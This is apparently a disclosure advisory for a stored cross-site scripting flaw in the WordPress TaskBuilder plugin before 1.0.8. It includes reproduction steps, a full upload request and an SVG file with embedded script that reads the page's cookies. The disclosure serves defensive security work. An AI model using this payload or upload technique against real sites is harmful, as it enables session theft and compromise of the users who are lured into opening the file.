Wordpress Plugin TaskBuilder < 1.0.8 — Subscriber + Stored XSS via SVG file upload
Description
Taskbuilder is a plug-in that helps you manage and get things done effectively, all your projects and tasks.
It has been seen that svg files are allowed to be uploaded in the file upload area in the plugin. It has been determined that the exploit code works when the SVG is uploaded and the url address to the uploaded file path is clicked.
The attacker can target their target users in the comments, causing them to click on the uploaded file.
While user authentication is required for the file upload field, no user authentication is required for the uploaded file url address.
The details of the discovery are given below.
Proof of Concept (PoC)
The details of the various Stored XSS on the application are given below.
Steps To Reproduce :
- Go to http://vuln.local/wp-admin/admin.php?page=wppm-tasks
- Choose any tasks.
- Focus on “Write a comment”.
- Click on “Attach Files”.
- “file” parameter is intervened by proxy.
- Fill in payload(XSS-SVG) in the file parameter.
- Click on “Comment”.
- View the uploaded image and call the URL. (Sample : http://vuln.local/?wppm_attachment=86&tid=1&tac=OtjI9JpnQU)
Sample Request :
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: vuln.local
Cookie: ...
...
Referer: http://vuln.local/wp-admin/admin.php?page=wppm-tasks
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------212199795625489804601222718372
Content-Length: 975
Origin: http://vuln.local
Connection: close
-----------------------------212199795625489804601222718372
Content-Disposition: form-data; name="file"; filename="captcha.svg"
Content-Type: text/plain
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
<script type="text/javascript">
alert(document.cookie);
</script>
</svg>
-----------------------------212199795625489804601222718372
Content-Disposition: form-data; name="arr_name"
captcha.php
-----------------------------212199795625489804601222718372
Content-Disposition: form-data; name="action"
wppm_upload_file
-----------------------------212199795625489804601222718372
Content-Disposition: form-data; name="nonce"
b1f6248d72
-----------------------------212199795625489804601222718372--Payload :
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
<script type="text/javascript">
alert(document.cookie);
</script>
</svg>Parameter(s) : file
